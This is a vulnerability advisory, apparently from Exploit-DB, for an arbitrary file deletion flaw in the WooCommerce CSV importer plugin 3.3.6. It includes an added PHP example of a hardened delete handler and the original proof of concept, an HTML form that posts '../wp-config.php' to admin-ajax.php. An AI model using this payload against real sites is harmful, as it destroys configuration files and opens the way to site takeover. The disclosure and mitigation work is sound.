vendor: CSV importer
by: Lenon Leite
CVSS: 7.5 (HIGH)
CWE: RCE (Remote Code Execution)
Product Name: CSV importer
Affected Version From: 3.3.2006
Affected Version To: 3.3.2006
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Ubuntu 16.1
2018

Plugin Woocommerce CSV importer 3.3.6 – RCE – Unlink

The Woocommerce CSV importer plugin, version 3.3.6, allows any registered user to perform remote code execution. The vulnerability exists because the $_POST['filename'] parameter is not escaped before it is used as a file path. By sending a specially crafted request to admin-ajax.php with the delete_export_file action, an attacker can unlink files on the server, including files outside the export directory such as wp-config.php.

Mitigation:

The vendor has not provided any mitigation or remediation for this vulnerability.
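
In the absence of a vendor fix, the following added example (not the plugin's code and not from the advisory author) shows how a handler for the delete_export_file action could confine deletion to an export directory and restrict who may call it. The csvimport_* function names, the csv-exports directory, the nonce action name and the manage_woocommerce capability requirement are assumptions.

```php
<?php
// Added example, not the plugin's code. Assumed names: csvimport_* functions,
// the 'csv-exports' directory, the 'csvimport_delete_export' nonce action,
// and the 'manage_woocommerce' capability requirement.

// Resolve a user-supplied name to a file directly inside $base_dir, or return null.
function csvimport_resolve_export_file( $base_dir, $filename ) {
    // basename() drops directory components, so "../wp-config.php" becomes "wp-config.php".
    $name = basename( str_replace( '\\', '/', (string) $filename ) );
    if ( '' === $name || '.' === $name || '..' === $name ) {
        return null;
    }
    // Accept only the file type the export feature produces (assumed: .csv).
    if ( 'csv' !== strtolower( pathinfo( $name, PATHINFO_EXTENSION ) ) ) {
        return null;
    }
    $base = realpath( $base_dir );
    $path = ( false === $base ) ? false : realpath( $base . DIRECTORY_SEPARATOR . $name );
    // realpath() follows symlinks; the resolved file must still sit directly in $base.
    if ( false === $path || dirname( $path ) !== $base || ! is_file( $path ) ) {
        return null;
    }
    return $path;
}

function csvimport_delete_export_file() {
    // Nonce check blocks cross-site form posts; capability check blocks low-privilege users.
    check_ajax_referer( 'csvimport_delete_export', 'nonce' );
    if ( ! current_user_can( 'manage_woocommerce' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }
    $uploads = wp_upload_dir();
    $dir     = trailingslashit( $uploads['basedir'] ) . 'csv-exports';
    $raw     = isset( $_POST['filename'] ) ? wp_unslash( $_POST['filename'] ) : '';
    $path    = csvimport_resolve_export_file( $dir, $raw );
    if ( null === $path ) {
        wp_send_json_error( 'invalid filename', 400 );
    }
    wp_delete_file( $path );
    wp_send_json_success();
}

// Registered only when WordPress is loaded; wp_ajax_* hooks run for logged-in users only.
if ( function_exists( 'add_action' ) ) {
    add_action( 'wp_ajax_delete_export_file', 'csvimport_delete_export_file' );
}
```

With this check, the filename value from the proof of concept resolves to wp-config.php inside the export directory, fails the extension test, and is rejected before any unlink happens.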
Source

Exploit-DB raw data:

# Exploit Title:  Plugin Woocommerce CSV importer 3.3.6 – RCE – Unlink
# Date: 08/04/2018
# Exploit Author: Lenon Leite
# Vendor Homepage: https://wordpress.org/plugins/woocommerce-csvimport/
# Software Link: https://wordpress.org/plugins/woocommerce-csvimport/
# Contact: http://twitter.com/lenonleite
# Website: http://lenonleite.com.br/
# Category: webapps
# Version: 3.3.6
# Tested on: Ubuntu 16.1
#

1. Description

   - Type user access: any user registered.
   - $_POST['filename'] is not escaped.

2. Proof of Concept

<form method="post"
   action="http://target/wp-admin/admin-ajax.php?action=delete_export_file">
   <input type="text" name="filename" value="../wp-config.php">
   <input type="submit">
</form>


   - Date Discovery : 11/23/2017
   - Date Vendor Contact : 12/29/2017
   - Date Publish : 08/04/2018
   - Date Resolution :

 
# Sincerely,
#
# Lenon Leite